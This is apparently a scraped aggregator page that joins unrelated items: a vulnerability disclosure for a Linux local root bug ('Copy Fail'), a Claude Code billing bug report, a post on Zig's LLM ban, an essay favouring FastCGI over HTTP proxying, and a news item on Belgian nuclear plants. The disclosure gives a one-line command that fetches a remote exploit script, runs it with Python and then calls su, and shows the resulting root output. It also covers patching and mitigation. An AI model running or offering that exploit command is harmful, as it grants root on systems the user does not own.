10 interesting stories served every morning and every evening.
10 interesting stories served every morning and every evening.
CVE-2026 – 31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset.Copy Fail is a straight-line logic flaw — it needs neither.The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.
tmux — copy fail demo
live
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High
Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.
any user becomes root
High
Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.
cross-container, cross-tenant
High
CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.
a PR becomes root on the runner
High
Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.
tenant becomes host root
Medium
Standard Linux servers
Single-tenant production where only your team has shell access.
internal LPE; chains with web RCE or stolen creds
Lower
Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root.
post-exploitation step-up
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026 – 31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo “install algif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
FAQ
Loading FAQ…
Disclosure timeline
2026 – 03-23Reported to Linux kernel security team
2026 – 03-24Initial acknowledgment
2026 – 03-25Patches proposed and reviewed
2026 – 04-01Patch committed to mainline
2026 – 04-22CVE-2026 – 31431 assigned
2026 – 04-29Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4 – 6[1m] (also reproduces with claude-opus-4 – 7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with “out of extra usage” (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m “add HERMES.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => API Error: 400 “You’re out of extra usage…”
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m “add hermes.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => “Hello!”
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
JavaScript is not available. We’ve detected that JavaScript is disabled in this browser. Please enable JavaScript or switch to a supported browser to continue using x.com. You can see a list of supported browsers in our Help Center.
Something went wrong, but don’t fret — let’s give it another shot.
Some privacy related extensions may cause issues on x.com. Please disable them and try again.
Zig has one of the most stringent anti-LLM policies of any major open source project:
No LLMs for issues.
No LLMs for pull requests.
No LLMs for comments on the bug tracker, including translation. English is encouraged, but not required. You are welcome to post in your native language and rely on others to have their own translation tools of choice to interpret your words.
No LLMs for issues.
No LLMs for pull requests.
No LLMs for comments on the bug tracker, including translation. English is encouraged, but not required. You are welcome to post in your native language and rely on others to have their own translation tools of choice to interpret your words.
The most prominent project written in Zig may be the Bun JavaScript runtime, which was acquired by Anthropic in December 2025 and, unsurprisingly, makes heavy use of AI assistance.
Bun operates its own fork of Zig, and recently achieved a 4x performance improvement on Bun compile after adding “parallel semantic analysis and multiple codegen units to the llvm backend”. Here’s that code. But @bunjavascript says:
We do not currently plan to upstream this, as Zig has a strict ban on LLM-authored contributions.
We do not currently plan to upstream this, as Zig has a strict ban on LLM-authored contributions.
(Update: here’s a Zig core contributor providing details on why they wouldn’t accept that particular patch independent of the LLM issue - parallel semantic analysis is a long planned feature but has implications “for the Zig language itself”.)
In Contributor Poker and Zig’s AI Ban (via Lobste.rs) Zig Software Foundation VP of Community Loris Cro explains the rationale for this strict ban. It’s the best articulation I’ve seen yet for a blanket ban on LLM-assisted contributions:
In successful open source projects you eventually reach a point where you start getting more PRs than what you’re capable of processing. Given what I mentioned so far, it would make sense to stop accepting imperfect PRs in order to maximize ROI from your work, but that’s not what we do in the Zig project. Instead, we try our best to help new contributors to get their work in, even if they need some help getting there. We don’t do this just because it’s the “right” thing to do, but also because it’s the smart thing to do.
In successful open source projects you eventually reach a point where you start getting more PRs than what you’re capable of processing. Given what I mentioned so far, it would make sense to stop accepting imperfect PRs in order to maximize ROI from your work, but that’s not what we do in the Zig project. Instead, we try our best to help new contributors to get their work in, even if they need some help getting there. We don’t do this just because it’s the “right” thing to do, but also because it’s the smart thing to do.
Zig values contributors over their contributions. Each contributor represents an investment by the Zig core team - the primary goal of reviewing and accepting PRs isn’t to land new code, it’s to help grow new contributors who can become trusted and prolific over time.
LLM assistance breaks that completely. It doesn’t matter if the LLM helps you submit a perfect PR to Zig - the time the Zig team spends reviewing your work does nothing to help them add new, confident, trustworthy contributors to their overall project.
Loris explains the name here:
The reason I call it “contributor poker” is because, just like people say about the actual card game, “you play the person, not the cards”. In contributor poker, you bet on the contributor, not on the contents of their first PR.
The reason I call it “contributor poker” is because, just like people say about the actual card game, “you play the person, not the cards”. In contributor poker, you bet on the contributor, not on the contents of their first PR.
This makes a lot of sense to me. It relates to an idea I’ve seen circulating elsewhere: if a PR was mostly written by an LLM, why should a project maintainer spend time reviewing and discussing that PR as opposed to firing up their own LLM to solve the same problem?
HTTP reverse proxying is a minefield.
Just the other week, a researcher disclosed a desync
vulnerability in Discord’s media proxy that allowed spying on private
attachments. This is not unusual; these vulnerabilities just keep coming.
The problem is the widespread use of HTTP as the protocol between reverse proxies
and backends, even though it’s unfit for the job.
But we don’t have to use HTTP here.
There’s a 30-year-old protocol for proxy-to-backend communication
that avoids HTTP’s pitfalls. It’s called FastCGI,
and its specification was released 30 years ago today.
FastCGI is a Wire Protocol, not a Process Model
It’s true that some web servers can automatically spawn FastCGI processes
to handle requests for files with the .fcgi extension, much like they
would for .cgi files. But you don’t have to use FastCGI this way - you
can also use the FastCGI protocol just like HTTP, with requests sent
over a TCP or UNIX socket to a long-running daemon that handles them as if they
were HTTP requests.
For example, in Go all you have to do is import the
net/http/fcgi
standard library package and replace http.Serve with fcgi.Serve:
Go HTTP
l, _ := net.Listen(“tcp”, “127.0.0.1:8080″)
http.Serve(l, handler)
Go FastCGI
l, _ := net.Listen(“tcp”, “127.0.0.1:8080″)
fcgi.Serve(l, handler)
Everything else about your app stays the same - even your handler, which continues to use the standard
http.ResponseWriter and http.Request types.
Popular proxies like Apache, Caddy, nginx, and HAProxy support FastCGI backends, and the configuration is simple:
nginx HTTP
proxy_pass http://localhost:8080;
nginx FastCGI
fastcgi_pass localhost:8080;
include fastcgi_params;
Apache HTTP
ProxyPass / http://localhost:8080/
Apache FastCGI
ProxyPass / fcgi://localhost:8080/
Caddy HTTP
reverse_proxy localhost:8080 {
transport http {
}
}
Caddy FastCGI
reverse_proxy localhost:8080 {
transport fastcgi {
}
}
HAProxy HTTP
backend app_backend
server s1 localhost:8080
HAProxy FastCGI
fcgi-app fcgi_app
docroot /
backend app_backend
use-fcgi-app fcgi_app
server s1 localhost:8080 proto fcgi
Why HTTP Sucks for Reverse Proxies: Desync Attacks / Request Smuggling
HTTP/1.1 has the tragic property of looking simple on the surface
(it’s just text!) but actually being a nightmare to parse robustly.
There are so many different ways to format the same HTTP message,
and there are too many edge cases and ambiguities for implementations to handle consistently.
As a result, no two HTTP/1.1 implementations
are exactly the same, and the same message can be parsed differently by different parsers.
The most serious problem is that there is no explicit framing of HTTP
messages - the message itself describes where it ends, and there are
multiple ways for a message to do that, all with their own edge cases.
Implementations can disagree about where a message ends,
and consequently, where the next message begins. This is the foundation of
HTTP desync attacks,
also known as request smuggling, wherein a reverse proxy and a backend disagree about
the boundaries between HTTP messages, causing all sorts of nightmare
security issues, such as the Discord vulnerability I linked above.
A lot of people seem to think you can just patch the parser divergences,
but this is a losing strategy. James Kettle
just keeps finding new ones. After
finding another batch last year,
he declared “HTTP/1.1 must die”.
HTTP/2, when consistently used between the proxy and backend, fixes desync by putting clear boundaries around messages, but FastCGI
has been doing that since 1996 with a simpler protocol.
For context, nginx has supported FastCGI backends since its first release,
but only got support for HTTP/2 backends in late 2025. Apache’s support for HTTP/2 backends is still “experimental”.
Why HTTP Sucks for Reverse Proxies: Untrusted Headers
If desync attacks were the only problem, you could just use HTTP/2 and call it
a day. Unfortunately, there’s another problem: HTTP has no robust way
for the proxy to convey trusted information about the request, such as the real client IP address,
authenticated username (if the proxy handles authentication), or client certificate details
(if mTLS is used).
The only option is to stick this information in HTTP headers, alongside
the headers proxied from the client, without a clear structural distinction between trusted
headers from the proxy and untrusted headers from a potential attacker.
For example, the X-Real-IP header is often used
to convey the client’s real IP address. In theory, if your proxy correctly deletes all instances
of the X-Real-IP header (not just the first, and including case variations like x-REaL-ip) before adding its own, you’re safe.
In practice, this is a minefield
and there are an awful lot of ways your backend can end up trusting attacker-controlled data.
Your proxy really needs to delete not just X-Real-IP, but any header that’s used for this sort of thing,
just in case some part of your stack relies on it without your knowledge.
For example, the Chi middleware determines the client’s real IP address by looking at the
True-Client-IP header first. Only if True-Client-IP doesn’t exist does it use X-Real-IP.
30.04.2026, 11:37 Uhr
Belgium will stop decommissioning its nuclear power plants, Prime Minister Bart De Wever announced on Thursday.
The government is going to negotiate with operator ENGIE over the nationalization of the plants, De Wever said.
“This government chooses safe, affordable, and sustainable energy. With less dependence on fossil imports and more control over our own supply,” he wrote on X.
ENGIE said it signed a letter of intent with the Belgian government on exclusive negotiations.
The agreement covers the potential acquisition of “the complete nuclear fleet of seven reactors, the associated personnel, all nuclear subsidiaries, as well as all associated assets and liabilities, including decommissioning and dismantling obligations,” a press release said.
A basic agreement is expected to be reached by October, it said.
Belgium originally decided in 2003 to phase-out nuclear power production by 2025, but political debate and energy security concerns have led to delays.
Last year the Belgian parliament voted by a large majority to end the nuclear phase-out. De Wever’s government also aims to build new nuclear power plants.
Belgium has seven nuclear reactors at two different sites, although three reactors have already been taken off the grid.
The fate of the ageing installations has been debated for decades. The country is currently heavily dependent on gas imports to cover its electricity needs as it has been struggling to expand renewable power generation significantly.
Bart De Wever on X
ENGIE press release
(c) 2026 dpa Deutsche Presse Agentur GmbH
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.